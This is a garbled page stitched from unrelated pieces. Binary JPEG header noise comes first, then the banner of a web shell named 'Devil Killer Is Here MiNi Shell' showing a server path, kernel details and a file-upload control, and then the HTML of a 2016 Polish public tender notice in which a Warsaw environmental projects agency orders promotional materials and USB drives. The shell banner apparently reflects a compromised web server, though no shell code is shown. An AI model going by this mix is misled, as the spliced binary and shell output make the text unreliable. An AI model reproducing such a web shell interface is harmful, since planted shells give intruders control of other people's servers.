JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160429/48563-N-2016.html

<p class="kh_header"><b>Warszawa: Opracowanie graficzne, wykonanie oraz dostawa materiałów promocyjnych 
w związku z wdrażaniem projektów z II osi priorytetowej POIiŚ.</b><br>
<b>Numer ogłoszenia: 48563 - 2016; data zamieszczenia: 29.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Koordynacji Projektów Środowiskowych , ul. Bitwy Warszawskiej 1920 r. nr 3, 02-362 Warszawa, woj. mazowieckie, tel. 22 318 70 82, faks 22 318 70 98.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ckps.lasy.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nieposiadająca osobowości prawnej..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie graficzne, wykonanie oraz dostawa materiałów promocyjnych 
w związku z wdrażaniem projektów z II osi priorytetowej POIiŚ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. PRZEDMIOT ZAMÓWIENIA:
1. Przedmiotem zamówienia jest opracowanie graficzne, wykonanie oraz dostawa materiałów promocyjnych na potrzeby organizacji szkoleń, konsultacji, konferencji oraz innych wydarzeń informacyjnych lub udziału w nich w związku z pełnieniem przez CKPŚ roli Instytucji Wdrażającej w ramach II osi priorytetowej POIiŚ.
Zamówienie realizowane jest w związku z projektami wdrażanymi przez CKPŚ w ramach Programu Infrastruktura i Środowisko 2014-2020, II oś priorytetowa, działanie 2.4 (priorytet inwestycyjny 6.iii) w zakresie:
1) ochrona in-situ lub ex-situ zagrożonych gatunków i siedlisk przyrodniczych;
2) rozwój zielonej infrastruktury, w tym zwiększanie drożności korytarzy ekologicznych lądowych i wodnych mających znaczenie dla ochrony różnorodności biologicznej i adaptacji do zmian klimatu.
II. ZAKRES PRZEDMIOTU ZAMÓWIENIA: 
1. Przedmiot zamówienia podzielony jest na 3 części, tj.
Część zamówienia nr 1. - teczki (400 szt.), długopisy (400 szt.) i notesy (400 szt.);
Część zamówienia nr 2. - roll-up (2 szt.), składany stojak na broszury i ulotki A4 (2 szt.);
Część zamówienia nr 3. - pamięć USB (300 szt.)

W częściach nr 1., nr 2., nr 3. przedmiot zamówienia obejmuje:

1. opracowanie graficzne,
2. wykonanie materiałów promocyjnych zgodnie z niniejszą specyfikacją,
3. dostarczenie materiałów promocyjnych do siedziby Zamawiającego w Warszawie.
Na wszystkich materiałach promocyjnych naniesione (w zależności od techniki określonej w OPZ) muszą być odpowiednie logotypy i treści informujące o dofinansowaniu zgodnie z wytycznymi aktualnymi dla POIiŚ 2014-2020 i dostępnymi na http://www.pois.gov.pl/strony/o-programie/promocja/zasady-promocji-i-oznakowania-projektow-w-programie/, a także logiem CKPŚ dostarczonym przez Zamawiającego w formie bitmapy lub pliku wektorowego.

Oferowane w częściach nr 1., nr 2., nr 3. materiały promocyjne, o których mowa powyżej, muszą być fabrycznie nowe, bez śladów użytkowania, pełnowartościowe, nieprefabrykowane, nieuszkodzone, bez jakichkolwiek wad fabrycznych czy użytkowych. W czasie dostawy zamówienia Wykonawca jest zobowiązany zabezpieczyć dostarczany towar przed wpływami atmosferycznymi, które mogłyby wpłynąć na jakość dostarczanych produktów. 
Wszystkie materiały ujęte w 2. części zamówienia będą objęte gwarancją Wykonawcy i zostaną dostarczone Zamawiającemu wraz z dokumentem gwarancji, przy tym okres gwarancji powinien wynosić co najmniej 12 miesięcy - liczone od dnia podpisania protokołu odbioru umowy. Wszelkie koszty gwarancji muszą być zawarte w cenie oferty. 
Wszystkie materiały ujęte w 3. części zamówienia będą objęte gwarancją Wykonawcy i zostaną dostarczone Zamawiającemu wraz z dokumentem gwarancji, przy tym okres gwarancji powinien wynosić co najmniej 24 miesiące - liczone od dnia podpisania protokołu odbioru umowy. Wszelkie koszty gwarancji muszą być zawarte w cenie oferty.

2. Szczegółowy opis przedmiotu zamówienia stanowi załącznik nr 1 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (a w przypadku świadczeń okresowych lub ciągłych wykonuje): 
Dla części nr 1 zamówienia:
co najmniej 2 (dwie) usługi polegające na wykonaniu oraz dostarczeniu materiałów promocyjnych (np. notesy i/lub teczki i/lub długopisy), o wartości min. 6 000,00 zł brutto (sześć tysięcy złotych brutto) każda.

Dla części nr 2 zamówienia:
co najmniej 1 (jedną) usługę polegającą na wykonaniu oraz dostarczeniu materiałów promocyjnych (np. roll-up lub stojak na foldery), o wartości min. 1 000,00 zł brutto (jeden tysiąc złotych brutto).

Dla części nr 3 zamówienia:
co najmniej 2 (dwie) usługi polegające na wykonaniu oraz dostarczeniu materiałów promocyjnych (np. pamięć USB), o wartości min. 4 000,00 zł brutto (cztery tysiące złotych brutto) każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczegółowy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest w takiej sytuacji udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (tj. w formie oryginału lub kopii poświadczonej notarialnie) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 
2. W przypadku gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres pełnomocnictwa. Pełnomocnictwo winno być podpisane przez osoby uprawnione do reprezentowania Wykonawcy. W przypadku załączenia kserokopii pełnomocnictwa, winno ono być potwierdzone za zgodność z oryginałem przez notariusza. 
3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w pkt 1, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty. 
4. Zasady udziału w postępowaniu Wykonawców występujących wspólnie o udzielenie zamówienia: 4.1.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty w oryginale. W przypadku załączenia kserokopii pełnomocnictwa, winno ono być potwierdzone za zgodność z oryginałem przez notariusza. 4.2.Oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być podpisana i oznaczona w taki sposób, by prawnie zobowiązywała wszystkie podmioty. 4.3.Dokumenty, tj. oświadczenie o braku podstaw do wykluczenia oraz listę podmiotów należących do tej samej grupy kapitałowej, składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia oddzielnie, natomiast dokumenty na potwierdzenie spełniania warunków udziału, wykonawcy mogą złożyć wspólnie. 4.4 Oświadczenie, o spełnianiu warunków udziału w postępowaniu, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą złożyć łącznie (na jednym druku) - w przypadku łącznego spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, albo każdy z Wykonawców odrębnie, w przypadku jeżeli taki Wykonawca spełnia samodzielnie wszystkie warunki udziału w postępowaniu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Termin wykonania zamówienia - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/ckps_warszawa/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Koordynacji Projektów Środowiskowych ul. Bitwy Warszawskiej 1920 r. nr 3, 02 - 362 Warszawa..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.05.2016 godzina 10:30, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Warszawie przy ul. Bitwy Warszawskiej 1920 r. nr 3, parter, 02-362 Warszawa, w sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu współfinansowanego przez Unię Europejską ze środków Funduszu Spójności w ramach pomocy technicznej Programu Operacyjnego Infrastruktura i Środowisko. Uwaga: Najkrótszy termin wykonania zamówienia, jaki może zaoferować Wykonawca to:
W części nr 1. -15 dni kalendarzowych od dnia podpisania umowy.
W części nr 2. - 15 dni kalendarzowych od dnia podpisania umowy.
W części nr 3. - 20 dni kalendarzowych od dnia podpisania umowy.

Maksymalny czas realizacji zamówienia wynosi: 
Część zamówienia nr 1. - Nie później niż 25 dni kalendarzowych od dnia podpisania umowy.
Część zamówienia nr 2. - Nie później niż 25 dni kalendarzowych od dnia podpisania umowy.
Część zamówienia nr 3. - Nie później niż 30 dni kalendarzowych od dnia podpisania umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> teczki (400 szt.), długopisy (400 szt.) i notesy (400 szt.).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

1. opracowanie graficzne,
2. wykonanie materiałów promocyjnych zgodnie z niniejszą specyfikacją,
3. dostarczenie materiałów promocyjnych do siedziby Zamawiającego w Warszawie.
Na wszystkich materiałach promocyjnych naniesione (w zależności od techniki określonej w OPZ) muszą być odpowiednie logotypy i treści informujące o dofinansowaniu zgodnie z wytycznymi aktualnymi dla POIiŚ 2014-2020 i dostępnymi na http://www.pois.gov.pl/strony/o-programie/promocja/zasady-promocji-i-oznakowania-projektow-w-programie/, a także logiem CKPŚ dostarczonym przez Zamawiającego w formie bitmapy lub pliku wektorowego.

1. Tekturowa teczka na dokumenty, wielokolorowa (400 szt.)
Format: mieszcząca dokument A4
Materiał: tektura (wytrzymały utwardzony karton) o grubości 2mm 
Druk: offset 4/0 na całości produktu
Opis: teczka skrzydełkowa (3 skrzydełka wewnątrz) zamykana na magnes lub pasek magnetyczny (magnes ukryty pod wklejką), w środku biała lub kremowa wyklejka, grzbiet 35 mm, laminat matowy na zewnętrznej i wewnętrznej stronie produktu, lakier wybiórczy (punktowy) UV jednostronny na froncie teczki.

2. Długopisy (400 szt.)
Złożone długopisy metalowe, z jednej strony zakończone rysikiem do ekranów dotykowych.
Wkład: pełny niebieski 
Kolor korpusu: ciemnozielony, srebrny lub czarny
Logo: grawerowane laserowo 
Długość: co najmniej 13 cm 
Średnica: co najmniej 1 cm 
Mechanizm: wciskany. 
 
3. Notesy (400 szt.)
Format: A5 
Okładka: 210 mm x 150 mm (+/- 10 mm), papier kreda 350 g/m2, lakier dyspersyjny matowy na całości okładek, tłoczenie grafik, druk: offset 
i wypukły, pełny kolor 4/0. Otwierana jak zeszyt. Na wewnętrznej okładce notesu zamieszczone 3 rodzaje papierowych karteczek w kolorach fluorescencyjnych oraz pastelowych, typu post it: 1 duży bloczek (20 karteczek), 3 średnie bloczki (po 20 karteczek), 6 małych, podłużnych bloczków (po 20 karteczek), rogi zaokrąglone.
Papier w środku notatnika: offset, wzór szara kratka, 135 g/m2 (+/- 15g/m2), znak wodny, 50 kartek klejonych wzdłuż górnej lub bocznej krawędzi, falcowanie, rogi zaokrąglone.

Oferowane materiały promocyjne, o których mowa powyżej, muszą być fabrycznie nowe, bez śladów użytkowania, pełnowartościowe, nieprefabrykowane, nieuszkodzone, bez jakichkolwiek wad fabrycznych czy użytkowych. W czasie dostawy zamówienia Wykonawca jest zobowiązany zabezpieczyć dostarczany towar przed wpływami atmosferycznymi, które mogłyby wpłynąć na jakość dostarczanych produktów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Termin wykonania zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> roll-up (2 szt.), składany stojak na broszury i ulotki A4 (2 szt.).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:

1. opracowanie graficzne,
2. wykonanie materiałów promocyjnych zgodnie z niniejszą specyfikacją,
3. dostarczenie materiałów promocyjnych do siedziby Zamawiającego w Warszawie.
Na wszystkich materiałach promocyjnych naniesione (w zależności od techniki określonej w OPZ) muszą być odpowiednie logotypy i treści informujące o dofinansowaniu zgodnie z wytycznymi aktualnymi dla POIiŚ 2014-2020 i dostępnymi na http://www.pois.gov.pl/strony/o-programie/promocja/zasady-promocji-i-oznakowania-projektow-w-programie/, a także logiem CKPŚ dostarczonym przez Zamawiającego w formie bitmapy lub pliku wektorowego.

1. Roll-up - 2 szt.
Stabilne, niewywrotne roll-upy
Wymiary: nie mniej niż 2000 x 1000 mm,
stojak z regulacją pionu, 
Kaseta: aluminiowa 
Mocowanie grafiki: listwa zaciskowa.
Podstawa: szeroka, masywna o przekroju zbliżonym do trójkąta.
Materiał: typu block-out, laminowany, matowy, odporny na warunki atmosferyczne, wilgoć, zagniecenia i zarysowania, nieprzepuszczający światła, zapewniający trwałość i niezmienność zadruku oraz wyrazistość kolorów, grubość materiału minimum 500 g/m2. Roll-upy z możliwością wymiany środka/materiału. 
Torba do transportu: z mocnego, nieprującego się materiału.
Gwarancja: 12 mc

2. Składany stojak na broszury i ulotki A4 - 2 szt.
Przenośny, dwustronny i trwały stojak na broszury i ulotki A4
Wymiary ogólne po rozłożeniu (WxSxG): nie mniejsze niż 1400 x 250 x 320 mm. 
Wymiary po złożeniu: nie większe niż 120 x 280 x 430 mm.
Materiał: stelaż wykonany z lekkich i wytrzymałych aluminiowych profili, półki 
z bezbarwnej plexi. 
Kolor stojaka: srebrny.
Ilość półek (kieszeni): 6 na format A4.
Torba do transportu: trwała aluminiowa walizka.
Gwarancja: 12 mc. 

Oferowane materiały promocyjne, o których mowa powyżej, muszą być fabrycznie nowe, bez śladów użytkowania, pełnowartościowe, nieprefabrykowane, nieuszkodzone, bez jakichkolwiek wad fabrycznych czy użytkowych. W czasie dostawy zamówienia Wykonawca jest zobowiązany zabezpieczyć dostarczany towar przed wpływami atmosferycznymi, które mogłyby wpłynąć na jakość dostarczanych produktów. 

Wszystkie materiały ujęte w 2. części zamówienia będą objęte gwarancją Wykonawcy i zostaną dostarczone Zamawiającemu wraz z dokumentem gwarancji, przy tym okres gwarancji powinien wynosić co najmniej 12 miesięcy - liczone od dnia podpisania protokołu odbioru umowy. Wszelkie koszty gwarancji muszą być zawarte w cenie oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 25.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Termin wykonania zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pamięć USB (300 szt.).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> przedmiot zamówienia obejmuje:

1. opracowanie graficzne,
2. wykonanie materiałów promocyjnych zgodnie z niniejszą specyfikacją,
3. dostarczenie materiałów promocyjnych do siedziby Zamawiającego w Warszawie.
Na wszystkich materiałach promocyjnych naniesione (w zależności od technik określonej w OPZ) muszą być umieszczone odpowiednie logotypy i treści informujące o dofinansowaniu zgodnie z wytycznymi aktualnymi dla POIiŚ 2014-2020 i dostępnymi na http://www.pois.gov.pl/strony/o-programie/promocja/zasady-promocji-i-oznakowania-projektow-w-programie/, a także logiem CKPŚ dostarczonym przez Zamawiającego w formie bitmapy lub pliku wektorowego.

1. Pamięć USB 16 GB 
Pamięć USB 16 GB obsługująca funkcję USB OTG (On-The-Go). 
Rozmiar pamięci USB: 
Poszczególne wymiary muszą mieścić się w przedziałach:
Wymiar 1: 65-75 mm
Wymiar 2: 15-20 mm
Wymiar 3: 5-10 mm

Interfejs USB: 3.0, 
Materiał główny: metalowa obudowa, tworzywo sztuczne,
Kolor główny: indywidualny wskazany przez Zamawiającego z dostępnej palety kolorów (przedstawienie do wyboru w ciągu 3 dni roboczych od dnia podpisania umowy)
